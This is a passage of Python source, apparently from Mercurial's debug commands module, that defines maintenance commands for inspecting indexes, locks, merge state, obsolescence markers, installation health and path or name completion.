    maxvariantlength = max(len(fv.name) for fv in upgrade.allformatvariant)
    maxvariantlength = max(len('format-variant'), maxvariantlength)
    def makeformatname(name):
        # a '%s:' format string padded so all value columns align
        return '%s:' + (' ' * (maxvariantlength - len(name)))
    fm = ui.formatter('debugformat', opts)
    if fm.isplain():
        def formatvalue(value):
            # plain output renders booleans as yes/no, strings verbatim
            if util.safehasattr(value, 'startswith'):
                return value
            if value:
                return 'yes'
            else:
                return 'no'
    else:
        formatvalue = pycompat.identity
    fm.plain('format-variant')
    fm.plain(' ' * (maxvariantlength - len('format-variant')))
    fm.plain(' repo')
    if ui.verbose:
        fm.plain(' config default')
    fm.plain('\n')
    for fv in upgrade.allformatvariant:
        fm.startitem()
        repovalue = fv.fromrepo(repo)
        configvalue = fv.fromconfig(repo)
        # pick labels so mismatches between repo/config/default stand out
        if repovalue != configvalue:
            namelabel = 'formatvariant.name.mismatchconfig'
            repolabel = 'formatvariant.repo.mismatchconfig'
        elif repovalue != fv.default:
            namelabel = 'formatvariant.name.mismatchdefault'
            repolabel = 'formatvariant.repo.mismatchdefault'
        else:
            namelabel = 'formatvariant.name.uptodate'
            repolabel = 'formatvariant.repo.uptodate'
        fm.write('name', makeformatname(fv.name), fv.name,
                 label=namelabel)
        fm.write('repo', ' %3s', formatvalue(repovalue),
                 label=repolabel)
        if fv.default != configvalue:
            configlabel = 'formatvariant.config.special'
        else:
            configlabel = 'formatvariant.config.default'
        fm.condwrite(ui.verbose, 'config', ' %6s', formatvalue(configvalue),
                     label=configlabel)
        fm.condwrite(ui.verbose, 'default', ' %7s', formatvalue(fv.default),
                     label='formatvariant.default')
        fm.plain('\n')
    fm.end()
@command('debugfsinfo', [], _('[PATH]'), norepo=True)
def debugfsinfo(ui, path="."):
    """show information detected about current filesystem"""
    ui.write(('path: %s\n') % path)
    ui.write(('mounted on: %s\n') % (util.getfsmountpoint(path) or '(unknown)'))
    ui.write(('exec: %s\n') % (util.checkexec(path) and 'yes' or 'no'))
    ui.write(('fstype: %s\n') % (util.getfstype(path) or '(unknown)'))
    ui.write(('symlink: %s\n') % (util.checklink(path) and 'yes' or 'no'))
    ui.write(('hardlink: %s\n') % (util.checknlink(path) and 'yes' or 'no'))
    casesensitive = '(unknown)'
    try:
        # probe case sensitivity with a throwaway file in 'path';
        # failure to create it just leaves the answer unknown
        with pycompat.namedtempfile(prefix='.debugfsinfo', dir=path) as f:
            casesensitive = util.fscasesensitive(f.name) and 'yes' or 'no'
    except OSError:
        pass
    ui.write(('case-sensitive: %s\n') % casesensitive)
@command('debuggetbundle',
    [('H', 'head', [], _('id of head node'), _('ID')),
     ('C', 'common', [], _('id of common node'), _('ID')),
     ('t', 'type', 'bzip2', _('bundle compression type to use'), _('TYPE'))],
    _('REPO FILE [-H|-C ID]...'),
    norepo=True)
def debuggetbundle(ui, repopath, bundlepath, head=None, common=None, **opts):
    """retrieves a bundle from a repo

    Every ID must be a full-length hex node id string. Saves the bundle to the
    given file.
    """
    opts = pycompat.byteskwargs(opts)
    repo = hg.peer(ui, opts, repopath)
    if not repo.capable('getbundle'):
        raise error.Abort("getbundle() not supported by target repository")
    args = {}
    if common:
        args[r'common'] = [bin(s) for s in common]
    if head:
        args[r'heads'] = [bin(s) for s in head]
    # TODO: get desired bundlecaps from command line.
    args[r'bundlecaps'] = None
    bundle = repo.getbundle('debug', **args)
    # map the user-facing compression name to an on-disk bundle type
    bundletype = opts.get('type', 'bzip2').lower()
    btypes = {'none': 'HG10UN',
              'bzip2': 'HG10BZ',
              'gzip': 'HG10GZ',
              'bundle2': 'HG20'}
    bundletype = btypes.get(bundletype)
    if bundletype not in bundle2.bundletypes:
        raise error.Abort(_('unknown bundle type specified with --type'))
    bundle2.writebundle(ui, bundle, bundlepath, bundletype)
@command('debugignore', [], '[FILE]')
def debugignore(ui, repo, *files, **opts):
    """display the combined ignore pattern and information about ignored files

    With no argument display the combined ignore pattern.

    Given space separated file names, shows if the given file is ignored and
    if so, show the ignore rule (file and line number) that matched it.
    """
    ignore = repo.dirstate._ignore
    if not files:
        # Show all the patterns
        ui.write("%s\n" % pycompat.byterepr(ignore))
    else:
        m = scmutil.match(repo[None], pats=files)
        for f in m.files():
            nf = util.normpath(f)
            ignored = None
            ignoredata = None
            if nf != '.':
                if ignore(nf):
                    ignored = nf
                    ignoredata = repo.dirstate._ignorefileandline(nf)
                else:
                    # not ignored directly: check each parent directory,
                    # stopping at the first ignored one
                    for p in util.finddirs(nf):
                        if ignore(p):
                            ignored = p
                            ignoredata = repo.dirstate._ignorefileandline(p)
                            break
            if ignored:
                if ignored == nf:
                    ui.write(_("%s is ignored\n") % m.uipath(f))
                else:
                    ui.write(_("%s is ignored because of "
                               "containing folder %s\n")
                             % (m.uipath(f), ignored))
                ignorefile, lineno, line = ignoredata
                ui.write(_("(ignore rule in %s, line %d: '%s')\n")
                         % (ignorefile, lineno, line))
            else:
                ui.write(_("%s is not ignored\n") % m.uipath(f))
@command('debugindex', cmdutil.debugrevlogopts + cmdutil.formatteropts,
    _('-c|-m|FILE'))
def debugindex(ui, repo, file_=None, **opts):
    """dump index data for a storage primitive"""
    opts = pycompat.byteskwargs(opts)
    store = cmdutil.openstorage(repo, 'debugindex', file_, opts)
    if ui.debugflag:
        shortfn = hex
    else:
        shortfn = short
    # probe the first entry to learn the rendered hash width (falls back
    # to 12 for an empty store)
    idlen = 12
    for i in store:
        idlen = len(shortfn(store.node(i)))
        break
    fm = ui.formatter('debugindex', opts)
    fm.plain(b'   rev linkrev %s %s p2\n' % (
        b'nodeid'.ljust(idlen),
        b'p1'.ljust(idlen)))
    for rev in store:
        node = store.node(rev)
        parents = store.parents(node)
        fm.startitem()
        fm.write(b'rev', b'%6d ', rev)
        fm.write(b'linkrev', '%7d ', store.linkrev(rev))
        fm.write(b'node', '%s ', shortfn(node))
        fm.write(b'p1', '%s ', shortfn(parents[0]))
        fm.write(b'p2', '%s', shortfn(parents[1]))
        fm.plain(b'\n')
    fm.end()
@command('debugindexdot', cmdutil.debugrevlogopts,
    _('-c|-m|FILE'), optionalrepo=True)
def debugindexdot(ui, repo, file_=None, **opts):
    """dump an index DAG as a graphviz dot file"""
    opts = pycompat.byteskwargs(opts)
    store = cmdutil.openstorage(repo, 'debugindexdot', file_, opts)
    ui.write(("digraph G {\n"))
    for rev in store:
        p1, p2 = store.parents(store.node(rev))
        ui.write("\t%d -> %d\n" % (store.rev(p1), rev))
        # only emit the second edge when there really is a second parent
        if p2 != nullid:
            ui.write("\t%d -> %d\n" % (store.rev(p2), rev))
    ui.write("}\n")
@command('debugindexstats', [])
def debugindexstats(ui, repo):
    """show stats related to the changelog index"""
    # exercise the index first (return value intentionally unused)
    repo.changelog.shortest(nullid, 1)
    index = repo.changelog.index
    if not util.safehasattr(index, 'stats'):
        raise error.Abort(_('debugindexstats only works with native code'))
    stats = index.stats()
    for key in sorted(stats):
        ui.write('%s: %s\n' % (key, stats[key]))
@command('debuginstall', [] + cmdutil.formatteropts, '', norepo=True)
def debuginstall(ui, **opts):
    '''test Mercurial installation

    Runs a series of sanity checks (encoding, Python, compiled modules,
    compression engines, templates, editor, username) and reports each
    through the formatter.

    Returns 0 on success.
    '''
    opts = pycompat.byteskwargs(opts)
    def writetemp(contents):
        # write 'contents' to a fresh temp file and return its path
        (fd, name) = pycompat.mkstemp(prefix="hg-debuginstall-")
        f = os.fdopen(fd, r"wb")
        f.write(contents)
        f.close()
        return name
    problems = 0
    fm = ui.formatter('debuginstall', opts)
    fm.startitem()
    # encoding
    fm.write('encoding', _("checking encoding (%s)...\n"), encoding.encoding)
    err = None
    try:
        codecs.lookup(pycompat.sysstr(encoding.encoding))
    except LookupError as inst:
        err = stringutil.forcebytestr(inst)
        problems += 1
    fm.condwrite(err, 'encodingerror', _(" %s\n"
                 " (check that your locale is properly set)\n"), err)
    # Python
    fm.write('pythonexe', _("checking Python executable (%s)\n"),
             pycompat.sysexecutable)
    fm.write('pythonver', _("checking Python version (%s)\n"),
             ("%d.%d.%d" % sys.version_info[:3]))
    fm.write('pythonlib', _("checking Python lib (%s)...\n"),
             os.path.dirname(pycompat.fsencode(os.__file__)))
    security = set(sslutil.supportedprotocols)
    if sslutil.hassni:
        security.add('sni')
    fm.write('pythonsecurity', _("checking Python security support (%s)\n"),
             fm.formatlist(sorted(security), name='protocol',
                           fmt='%s', sep=','))
    # These are warnings, not errors. So don't increment problem count. This
    # may change in the future.
    if 'tls1.2' not in security:
        fm.plain(_('  TLS 1.2 not supported by Python install; '
                   'network connections lack modern security\n'))
    if 'sni' not in security:
        fm.plain(_('  SNI not supported by Python install; may have '
                   'connectivity issues with some servers\n'))
    # TODO print CA cert info
    # hg version
    hgver = util.version()
    fm.write('hgver', _("checking Mercurial version (%s)\n"),
             hgver.split('+')[0])
    fm.write('hgverextra', _("checking Mercurial custom build (%s)\n"),
             '+'.join(hgver.split('+')[1:]))
    # compiled modules
    fm.write('hgmodulepolicy', _("checking module policy (%s)\n"),
             policy.policy)
    fm.write('hgmodules', _("checking installed modules (%s)...\n"),
             os.path.dirname(pycompat.fsencode(__file__)))
    if policy.policy in ('c', 'allow'):
        err = None
        try:
            from .cext import (
                base85,
                bdiff,
                mpatch,
                osutil,
            )
            dir(bdiff), dir(mpatch), dir(base85), dir(osutil) # quiet pyflakes
        except Exception as inst:
            err = stringutil.forcebytestr(inst)
            problems += 1
        fm.condwrite(err, 'extensionserror', " %s\n", err)
    compengines = util.compengines._engines.values()
    fm.write('compengines', _('checking registered compression engines (%s)\n'),
             fm.formatlist(sorted(e.name() for e in compengines),
                           name='compengine', fmt='%s', sep=', '))
    fm.write('compenginesavail', _('checking available compression engines '
                                   '(%s)\n'),
             fm.formatlist(sorted(e.name() for e in compengines
                                  if e.available()),
                           name='compengine', fmt='%s', sep=', '))
    wirecompengines = util.compengines.supportedwireengines(util.SERVERROLE)
    fm.write('compenginesserver', _('checking available compression engines '
                                    'for wire protocol (%s)\n'),
             fm.formatlist([e.name() for e in wirecompengines
                            if e.wireprotosupport()],
                           name='compengine', fmt='%s', sep=', '))
    re2 = 'missing'
    if util._re2:
        re2 = 'available'
    fm.plain(_('checking "re2" regexp engine (%s)\n') % re2)
    fm.data(re2=bool(util._re2))
    # templates
    p = templater.templatepaths()
    fm.write('templatedirs', 'checking templates (%s)...\n', ' '.join(p))
    fm.condwrite(not p, '', _(" no template directories found\n"))
    if p:
        m = templater.templatepath("map-cmdline.default")
        if m:
            # template found, check if it is working
            err = None
            try:
                templater.templater.frommapfile(m)
            except Exception as inst:
                err = stringutil.forcebytestr(inst)
                p = None
            fm.condwrite(err, 'defaulttemplateerror', " %s\n", err)
        else:
            p = None
        fm.condwrite(p, 'defaulttemplate',
                     _("checking default template (%s)\n"), m)
        fm.condwrite(not m, 'defaulttemplatenotfound',
                     _(" template '%s' not found\n"), "default")
    if not p:
        problems += 1
        fm.condwrite(not p, '',
                     _(" (templates seem to have been installed incorrectly)\n"))
    # editor
    editor = ui.geteditor()
    editor = util.expandpath(editor)
    editorbin = procutil.shellsplit(editor)[0]
    fm.write('editor', _("checking commit editor... (%s)\n"), editorbin)
    cmdpath = procutil.findexe(editorbin)
    # unset editor ('vi' default) is only a warning; a configured but
    # missing editor is a problem
    fm.condwrite(not cmdpath and editor == 'vi', 'vinotfound',
                 _(" No commit editor set and can't find %s in PATH\n"
                   " (specify a commit editor in your configuration"
                   " file)\n"), not cmdpath and editor == 'vi' and editorbin)
    fm.condwrite(not cmdpath and editor != 'vi', 'editornotfound',
                 _(" Can't find editor '%s' in PATH\n"
                   " (specify a commit editor in your configuration"
                   " file)\n"), not cmdpath and editorbin)
    if not cmdpath and editor != 'vi':
        problems += 1
    # check username
    username = None
    err = None
    try:
        username = ui.username()
    except error.Abort as e:
        err = stringutil.forcebytestr(e)
        problems += 1
    fm.condwrite(username, 'username',  _("checking username (%s)\n"), username)
    fm.condwrite(err, 'usernameerror', _("checking username...\n %s\n"
        " (specify a username in your configuration file)\n"), err)
    fm.condwrite(not problems, '',
                 _("no problems detected\n"))
    if not problems:
        fm.data(problems=problems)
    fm.condwrite(problems, 'problems',
                 _("%d problems detected,"
                   " please check your install!\n"), problems)
    fm.end()
    return problems
@command('debugknown', [], _('REPO ID...'), norepo=True)
def debugknown(ui, repopath, *ids, **opts):
    """test whether node ids are known to a repo
    Every ID must be a full-length hex node id string. Returns a list of 0s
    and 1s indicating unknown/known.
    """
    opts = pycompat.byteskwargs(opts)
    # Talk to the target over the peer interface so this works for both
    # local and remote repositories.
    peer = hg.peer(ui, opts, repopath)
    if not peer.capable('known'):
        raise error.Abort("known() not supported by target repository")
    knownflags = peer.known([bin(nodeid) for nodeid in ids])
    ui.write("%s\n" % "".join("1" if known else "0" for known in knownflags))
@command('debuglabelcomplete', [], _('LABEL...'))
def debuglabelcomplete(ui, repo, *args):
    '''backwards compatibility with old bash completion scripts (DEPRECATED)'''
    # Thin compatibility shim: old shell-completion scripts invoke
    # `hg debuglabelcomplete`; the actual completion logic lives in
    # debugnamecomplete, which this simply forwards to.
    debugnamecomplete(ui, repo, *args)
@command('debuglocks',
         [('L', 'force-lock', None, _('free the store lock (DANGEROUS)')),
          ('W', 'force-wlock', None,
           _('free the working state lock (DANGEROUS)')),
          ('s', 'set-lock', None, _('set the store lock until stopped')),
          ('S', 'set-wlock', None,
           _('set the working state lock until stopped'))],
         _('[OPTION]...'))
def debuglocks(ui, repo, **opts):
    """show or modify state of locks
    By default, this command will show which locks are held. This
    includes the user and process holding the lock, the amount of time
    the lock has been held, and the machine name where the process is
    running if it's not local.
    Locks protect the integrity of Mercurial's data, so should be
    treated with care. System crashes or other interruptions may cause
    locks to not be properly released, though Mercurial will usually
    detect and remove such stale locks automatically.
    However, detecting stale locks may not always be possible (for
    instance, on a shared filesystem). Removing locks may also be
    blocked by filesystem permissions.
    Setting a lock will prevent other commands from changing the data.
    The command will wait until an interruption (SIGINT, SIGTERM, ...) occurs.
    The set locks are removed when the command exits.
    Returns 0 if no locks are held.
    """
    # Force-free mode: unlink the lock files directly, bypassing the
    # normal release path -- hence the DANGEROUS warnings in the help.
    if opts.get(r'force_lock'):
        repo.svfs.unlink('lock')
    if opts.get(r'force_wlock'):
        repo.vfs.unlink('wlock')
    if opts.get(r'force_lock') or opts.get(r'force_wlock'):
        return 0
    # Set mode: acquire the requested lock(s) without waiting (False) and
    # hold them until the user answers the prompt or the process is killed.
    locks = []
    try:
        if opts.get(r'set_wlock'):
            try:
                locks.append(repo.wlock(False))
            except error.LockHeld:
                raise error.Abort(_('wlock is already held'))
        if opts.get(r'set_lock'):
            try:
                locks.append(repo.lock(False))
            except error.LockHeld:
                raise error.Abort(_('lock is already held'))
        if len(locks):
            ui.promptchoice(_("ready to release the lock (y)? $$ &Yes"))
            return 0
    finally:
        # Always release whatever we managed to acquire, even on Abort.
        release(*locks)
    # Show mode: report who holds each lock (or that it is free).
    now = time.time()
    held = 0
    def report(vfs, name, method):
        # Returns 1 if the lock is held by someone else, 0 if free.
        # this causes stale locks to get reaped for more accurate reporting
        try:
            l = method(False)
        except error.LockHeld:
            l = None
        if l:
            # We could acquire it, so nobody else holds it; release at once.
            l.release()
        else:
            try:
                st = vfs.lstat(name)
                age = now - st[stat.ST_MTIME]
                user = util.username(st.st_uid)
                locker = vfs.readlock(name)
                if ":" in locker:
                    # lock contents are "host:pid"; only show the host when
                    # the process is not on this machine
                    host, pid = locker.split(':')
                    if host == socket.gethostname():
                        locker = 'user %s, process %s' % (user or b'None', pid)
                    else:
                        locker = 'user %s, process %s, host %s' \
                                 % (user or b'None', pid, host)
                ui.write(("%-6s %s (%ds)\n") % (name + ":", locker, age))
                return 1
            except OSError as e:
                if e.errno != errno.ENOENT:
                    raise
        # Either we acquired the lock above or the lock file was missing.
        ui.write(("%-6s free\n") % (name + ":"))
        return 0
    held += report(repo.svfs, "lock", repo.lock)
    held += report(repo.vfs, "wlock", repo.wlock)
    return held
@command('debugmanifestfulltextcache', [
        ('', 'clear', False, _('clear the cache')),
        ('a', 'add', '', _('add the given manifest node to the cache'),
         _('NODE'))
    ], '')
def debugmanifestfulltextcache(ui, repo, add=None, **opts):
    """show, clear or amend the contents of the manifest fulltext cache"""
    with repo.lock():
        r = repo.manifestlog.getstorage(b'')
        try:
            cache = r._fulltextcache
        except AttributeError:
            # Not every revlog implementation exposes a fulltext cache.
            ui.warn(_(
                "Current revlog implementation doesn't appear to have a "
                'manifest fulltext cache\n'))
            return
        if opts.get(r'clear'):
            cache.clear()
        if add:
            try:
                manifest = repo.manifestlog[r.lookup(add)]
            except error.LookupError as e:
                raise error.Abort(e, hint="Check your manifest node id")
            # NOTE(review): relies on read() populating the fulltext cache
            # as a side effect, and on the cache object persisting itself;
            # confirm mutations actually reach disk.
            manifest.read() # stores revision in cache too
        if not len(cache):
            ui.write(_('Cache empty'))
        else:
            ui.write(
                _('Cache contains %d manifest entries, in order of most to '
                  'least recent:\n') % (len(cache),))
            totalsize = 0
            for nodeid in cache:
                # Use cache.get to not update the LRU order
                data = cache.get(nodeid)
                size = len(data)
                totalsize += size + 24 # 20 bytes nodeid, 4 bytes size
                ui.write(_('id: %s, size %s\n') % (
                    hex(nodeid), util.bytecount(size)))
            ondisk = cache._opener.stat('manifestfulltextcache').st_size
            ui.write(
                _('Total cache data size %s, on-disk %s\n') % (
                    util.bytecount(totalsize), util.bytecount(ondisk))
            )
@command('debugmergestate', [], '')
def debugmergestate(ui, repo, *args):
    """print merge state
    Use --verbose to print out information about whether v1 or v2 merge state
    was chosen."""
    def _hashornull(h):
        # Render the null hash as the literal string 'null' for readability.
        if h == nullhex:
            return 'null'
        else:
            return h
    def printrecords(version):
        # Pretty-print the raw merge-state records; closes over v1records /
        # v2records which are populated below before this is called.
        ui.write(('* version %d records\n') % version)
        if version == 1:
            records = v1records
        else:
            records = v2records
        for rtype, record in records:
            # pretty print some record types
            if rtype == 'L':
                ui.write(('local: %s\n') % record)
            elif rtype == 'O':
                ui.write(('other: %s\n') % record)
            elif rtype == 'm':
                # merge driver record: driver name and its state, \0-separated
                driver, mdstate = record.split('\0', 1)
                ui.write(('merge driver: %s (state "%s")\n')
                         % (driver, mdstate))
            elif rtype in 'FDC':
                # per-file records: fields are \0-separated; v1 lacks the
                # "other node" field, so it is synthesized for display
                r = record.split('\0')
                f, state, hash, lfile, afile, anode, ofile = r[0:7]
                if version == 1:
                    onode = 'not stored in v1 format'
                    flags = r[7]
                else:
                    onode, flags = r[7:9]
                ui.write(('file: %s (record type "%s", state "%s", hash %s)\n')
                         % (f, rtype, state, _hashornull(hash)))
                ui.write((' local path: %s (flags "%s")\n') % (lfile, flags))
                ui.write((' ancestor path: %s (node %s)\n')
                         % (afile, _hashornull(anode)))
                ui.write((' other path: %s (node %s)\n')
                         % (ofile, _hashornull(onode)))
            elif rtype == 'f':
                # file-extras record: filename plus key/value pairs
                filename, rawextras = record.split('\0', 1)
                extras = rawextras.split('\0')
                i = 0
                extrastrings = []
                while i < len(extras):
                    extrastrings.append('%s = %s' % (extras[i], extras[i + 1]))
                    i += 2
                ui.write(('file extras: %s (%s)\n')
                         % (filename, ', '.join(extrastrings)))
            elif rtype == 'l':
                # labels record: local/other and optionally a base label
                labels = record.split('\0', 2)
                labels = [l for l in labels if len(l) > 0]
                ui.write(('labels:\n'))
                ui.write((' local: %s\n' % labels[0]))
                ui.write((' other: %s\n' % labels[1]))
                if len(labels) > 2:
                    ui.write((' base: %s\n' % labels[2]))
            else:
                ui.write(('unrecognized entry: %s\t%s\n')
                         % (rtype, record.replace('\0', '\t')))
    # Avoid mergestate.read() since it may raise an exception for unsupported
    # merge state records. We shouldn't be doing this, but this is OK since this
    # command is pretty low-level.
    ms = mergemod.mergestate(repo)
    # sort so that reasonable information is on top
    v1records = ms._readrecordsv1()
    v2records = ms._readrecordsv2()
    order = 'LOml'
    def key(r):
        # Known record types sort first, in 'LOml' order; unknown types
        # sort after them by their raw record content.
        idx = order.find(r[0])
        if idx == -1:
            return (1, r[1])
        else:
            return (0, idx)
    v1records.sort(key=key)
    v2records.sort(key=key)
    if not v1records and not v2records:
        ui.write(('no merge state found\n'))
    elif not v2records:
        ui.note(('no version 2 merge state\n'))
        printrecords(1)
    elif ms._v1v2match(v1records, v2records):
        ui.note(('v1 and v2 states match: using v2\n'))
        printrecords(2)
    else:
        ui.note(('v1 and v2 states mismatch: using v1\n'))
        printrecords(1)
    if ui.verbose:
        printrecords(2)
@command('debugnamecomplete', [], _('NAME...'))
def debugnamecomplete(ui, repo, *args):
    '''complete "names" - tags, open branch names, bookmark names'''
    candidates = set()
    # The 'branches' namespace is skipped here and handled separately
    # below so that only open (non-closed) branches are offered.
    for nsname, ns in repo.names.iteritems():
        if nsname == 'branches':
            continue
        candidates.update(ns.listnames(repo))
    for tag, heads, tip, closed in repo.branchmap().iterbranches():
        if not closed:
            candidates.add(tag)
    # No arguments means "complete everything" (empty prefix).
    prefixes = args or ['']
    completions = set()
    for prefix in prefixes:
        completions.update(n for n in candidates if n.startswith(prefix))
    ui.write('\n'.join(sorted(completions)))
    ui.write('\n')
@command('debugobsolete',
        [('', 'flags', 0, _('markers flag')),
         ('', 'record-parents', False,
          _('record parent information for the precursor')),
         ('r', 'rev', [], _('display markers relevant to REV')),
         ('', 'exclusive', False, _('restrict display to markers only '
                                    'relevant to REV')),
         ('', 'index', False, _('display index of the marker')),
         ('', 'delete', [], _('delete markers specified by indices')),
        ] + cmdutil.commitopts2 + cmdutil.formatteropts,
         _('[OBSOLETED [REPLACEMENT ...]]'))
def debugobsolete(ui, repo, precursor=None, *successors, **opts):
    """create arbitrary obsolete marker
    With no arguments, displays the list of obsolescence markers."""
    opts = pycompat.byteskwargs(opts)
    def parsenodeid(s):
        try:
            # We do not use revsingle/revrange functions here to accept
            # arbitrary node identifiers, possibly not present in the
            # local repository.
            n = bin(s)
            if len(n) != len(nullid):
                raise TypeError()
            return n
        except TypeError:
            raise error.Abort('changeset references must be full hexadecimal '
                              'node identifiers')
    # Deletion mode: remove the markers at the given obsstore indices.
    if opts.get('delete'):
        indices = []
        for v in opts.get('delete'):
            try:
                indices.append(int(v))
            except ValueError:
                raise error.Abort(_('invalid index value: %r') % v,
                                  hint=_('use integers for indices'))
        if repo.currenttransaction():
            raise error.Abort(_('cannot delete obsmarkers in the middle '
                                'of transaction.'))
        with repo.lock():
            n = repair.deleteobsmarkers(repo.obsstore, indices)
            ui.write(_('deleted %i obsolescence markers\n') % n)
        return
    # Creation mode: record a marker obsoleting `precursor` with the
    # given successors. Uses explicit lock/transaction try/finally pairs.
    if precursor is not None:
        if opts['rev']:
            raise error.Abort('cannot select revision when creating marker')
        metadata = {}
        metadata['user'] = encoding.fromlocal(opts['user'] or ui.username())
        succs = tuple(parsenodeid(succ) for succ in successors)
        l = repo.lock()
        try:
            tr = repo.transaction('debugobsolete')
            try:
                date = opts.get('date')
                if date:
                    date = dateutil.parsedate(date)
                else:
                    date = None
                prec = parsenodeid(precursor)
                parents = None
                if opts['record_parents']:
                    # Parents can only be recorded for changesets we have.
                    if prec not in repo.unfiltered():
                        raise error.Abort('cannot used --record-parents on '
                                          'unknown changesets')
                    parents = repo.unfiltered()[prec].parents()
                    parents = tuple(p.node() for p in parents)
                repo.obsstore.create(tr, prec, succs, opts['flags'],
                                     parents=parents, date=date,
                                     metadata=metadata, ui=ui)
                tr.close()
            except ValueError as exc:
                raise error.Abort(_('bad obsmarker input: %s') %
                                  pycompat.bytestr(exc))
            finally:
                tr.release()
        finally:
            l.release()
    else:
        # Display mode: list markers, optionally filtered by --rev.
        if opts['rev']:
            revs = scmutil.revrange(repo, opts['rev'])
            nodes = [repo[r].node() for r in revs]
            markers = list(obsutil.getmarkers(repo, nodes=nodes,
                                              exclusive=opts['exclusive']))
            markers.sort(key=lambda x: x._data)
        else:
            markers = obsutil.getmarkers(repo)
        markerstoiter = markers
        isrelevant = lambda m: True
        if opts.get('rev') and opts.get('index'):
            # --index wants positions within the full marker list, so we
            # must iterate everything but only display the relevant subset.
            markerstoiter = obsutil.getmarkers(repo)
            markerset = set(markers)
            isrelevant = lambda m: m in markerset
        fm = ui.formatter('debugobsolete', opts)
        for i, m in enumerate(markerstoiter):
            if not isrelevant(m):
                # marker can be irrelevant when we're iterating over a set
                # of markers (markerstoiter) which is bigger than the set
                # of markers we want to display (markers)
                # this can happen if both --index and --rev options are
                # provided and thus we need to iterate over all of the markers
                # to get the correct indices, but only display the ones that
                # are relevant to --rev value
                continue
            fm.startitem()
            ind = i if opts.get('index') else None
            cmdutil.showmarker(fm, m, index=ind)
        fm.end()
@command('debugpathcomplete',
         [('f', 'full', None, _('complete an entire path')),
          ('n', 'normal', None, _('show only normal files')),
          ('a', 'added', None, _('show only added files')),
          ('r', 'removed', None, _('show only removed files'))],
         _('FILESPEC...'))
def debugpathcomplete(ui, repo, *specs, **opts):
    '''complete part or all of a tracked path
    This command supports shells that offer path name completion. It
    currently completes only files already known to the dirstate.
    Completion extends only to the next path segment unless
    --full is specified, in which case entire paths are used.'''
    def complete(path, acceptable):
        # Return (files, dirs) completions for `path`, limited to dirstate
        # entries whose state character is in `acceptable`.
        dirstate = repo.dirstate
        spec = os.path.normpath(os.path.join(encoding.getcwd(), path))
        rootdir = repo.root + pycompat.ossep
        # Ignore specs that point outside the repository.
        if spec != repo.root and not spec.startswith(rootdir):
            return [], []
        if os.path.isdir(spec):
            spec += '/'
        spec = spec[len(rootdir):]
        # dirstate stores '/' paths; translate on non-POSIX separators.
        fixpaths = pycompat.ossep != '/'
        if fixpaths:
            spec = spec.replace(pycompat.ossep, '/')
        speclen = len(spec)
        fullpaths = opts[r'full']
        files, dirs = set(), set()
        adddir, addfile = dirs.add, files.add
        for f, st in dirstate.iteritems():
            if f.startswith(spec) and st[0] in acceptable:
                if fixpaths:
                    f = f.replace('/', pycompat.ossep)
                if fullpaths:
                    addfile(f)
                    continue
                # Without --full, stop at the next path separator: a hit
                # means `f` lives in a subdirectory we offer as `dirs`.
                s = f.find(pycompat.ossep, speclen)
                if s >= 0:
                    adddir(f[:s])
                else:
                    addfile(f)
        return files, dirs
    # Build the accepted dirstate-state set from the filter options;
    # empty means "no filter" and falls back to 'nmar' below.
    acceptable = ''
    if opts[r'normal']:
        acceptable += 'nm'
    if opts[r'added']:
        acceptable += 'a'
    if opts[r'removed']:
        acceptable += 'r'
    cwd = repo.getcwd()
    if not specs:
        specs = ['.']
    files, dirs = set(), set()
    for spec in specs:
        f, d = complete(spec, acceptable or 'nmar')
        files.update(f)
        dirs.update(d)
    files.update(dirs)
    ui.write('\n'.join(repo.pathto(p, cwd) for p in sorted(files)))
    ui.write('\n')
@command('debugpeer', [], _('PATH'), norepo=True)
def debugpeer(ui, path):
    """establish a connection to a peer repository"""
    # Peer request logging is enabled unconditionally; the log lines only
    # become visible when the user also passes --debug.
    with ui.configoverride({('devel', 'debug.peer-request'): True}):
        peer = hg.peer(ui, {}, path)
        islocal = peer.local() is not None
        pushable = peer.canpush()
        ui.write(_('url: %s\n') % peer.url())
        ui.write(_('local: %s\n') % (_('yes') if islocal else _('no')))
        ui.write(_('pushable: %s\n') % (_('yes') if pushable else _('no')))
@command('debugpickmergetool',
        [('r', 'rev', '', _('check for files in this revision'), _('REV')),
         ('', 'changedelete', None, _('emulate merging change and delete')),
        ] + cmdutil.walkopts + cmdutil.mergetoolopts,
        _('[PATTERN]...'),
        inferrepo=True)
def debugpickmergetool(ui, repo, *pats, **opts):
    """examine which merge tool is chosen for specified file
    As described in :hg:`help merge-tools`, Mercurial examines
    configurations below in this order to decide which merge tool is
    chosen for specified file.
    1. ``--tool`` option
    2. ``HGMERGE`` environment variable
    3. configurations in ``merge-patterns`` section
    4. configuration of ``ui.merge``
    5. configurations in ``merge-tools`` section
    6. ``hgmerge`` tool (for historical reason only)
    7. default tool for fallback (``:merge`` or ``:prompt``)
    This command writes out examination result in the style below::
        FILE = MERGETOOL
    By default, all files known in the first parent context of the
    working directory are examined. Use file patterns and/or -I/-X
    options to limit target files. -r/--rev is also useful to examine
    files in another context without actual updating to it.
    With --debug, this command shows warning messages while matching
    against ``merge-patterns`` and so on, too. It is recommended to
    use this option with explicit file patterns and/or -I/-X options,
    because this option increases amount of output per file according
    to configurations in hgrc.
    With -v/--verbose, this command shows configurations below at
    first (only if specified).
    - ``--tool`` option
    - ``HGMERGE`` environment variable
    - configuration of ``ui.merge``
    If merge tool is chosen before matching against
    ``merge-patterns``, this command can't show any helpful
    information, even with --debug. In such case, information above is
    useful to know why a merge tool is chosen.
    """
    opts = pycompat.byteskwargs(opts)
    overrides = {}
    if opts['tool']:
        # Emulate `--tool` the same way the real merge machinery sees it.
        overrides[('ui', 'forcemerge')] = opts['tool']
        ui.note(('with --tool %r\n') % (pycompat.bytestr(opts['tool'])))
    with ui.configoverride(overrides, 'debugmergepatterns'):
        hgmerge = encoding.environ.get("HGMERGE")
        if hgmerge is not None:
            ui.note(('with HGMERGE=%r\n') % (pycompat.bytestr(hgmerge)))
        uimerge = ui.config("ui", "merge")
        if uimerge:
            ui.note(('with ui.merge=%r\n') % (pycompat.bytestr(uimerge)))
        ctx = scmutil.revsingle(repo, opts.get('rev'))
        m = scmutil.match(ctx, pats, opts)
        changedelete = opts['changedelete']
        for path in ctx.walk(m):
            fctx = ctx[path]
            try:
                # Suppress _picktool's own output unless --debug is set;
                # the buffer must always be popped, hence try/finally.
                if not ui.debugflag:
                    ui.pushbuffer(error=True)
                tool, toolpath = filemerge._picktool(repo, ui, path,
                                                    fctx.isbinary(),
                                                    'l' in fctx.flags(),
                                                    changedelete)
            finally:
                if not ui.debugflag:
                    ui.popbuffer()
            ui.write(('%s = %s\n') % (path, tool))
